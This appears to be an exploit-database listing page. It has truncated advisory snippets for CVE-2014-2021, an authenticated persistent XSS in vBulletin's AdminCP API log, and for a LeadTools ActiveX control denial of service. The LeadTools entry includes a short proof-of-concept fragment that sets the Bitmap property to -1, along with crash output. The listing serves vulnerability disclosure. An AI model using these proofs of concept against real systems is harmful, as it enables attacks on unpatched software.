CVE-2014-2021

Cross-site scripting XSS vulnerability in admincp/apilog.php in vBulletin 4.2.2 and earlier, and 5.0.x through 5.0.5 allows remote authenticated users to inject arbitrary web script or HTML via a crafted XMLRPC API request, as demonstrated using the client name...

vBulletin 5.x / 4.x Persistent Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API post-auth ============================================================================ ==================== Overview - -------- date : 10/12/2014 cvss : 4.6...

vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting

CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API post-auth ================================================================================================ Overview -------- date : 10/12/2014 cvss : 4.6 AV:N/AC:H/Au:S/C:P/I:P/A:P base cwe : 79 vendor : vBulletin...

LeadTools 11.5.0.9 - ltdlg11n.ocx Bitmap Access Violation Denial of Service

LeadTools 11.5.0.9 - ltdlg11n.ocx Bitmap Access Violation Denial of Service Test Exploit Page targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LEADDlgLib.LEADDlg" argCount = 1 arg1=-1 target.Bitmap = arg1...

LeadTools 11.5.0.9 - 'ltdlg11n.ocx' Bitmap Access Violation Denial of Service

Test Exploit Page targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LEADDlgLib.LEADDlg" argCount = 1 arg1=-1 target.Bitmap = arg1 Exception Code: ACCESSVIOLATION Disasm: AA62D2 CMP DWORD PTR EAX,6461656C Seh Chai...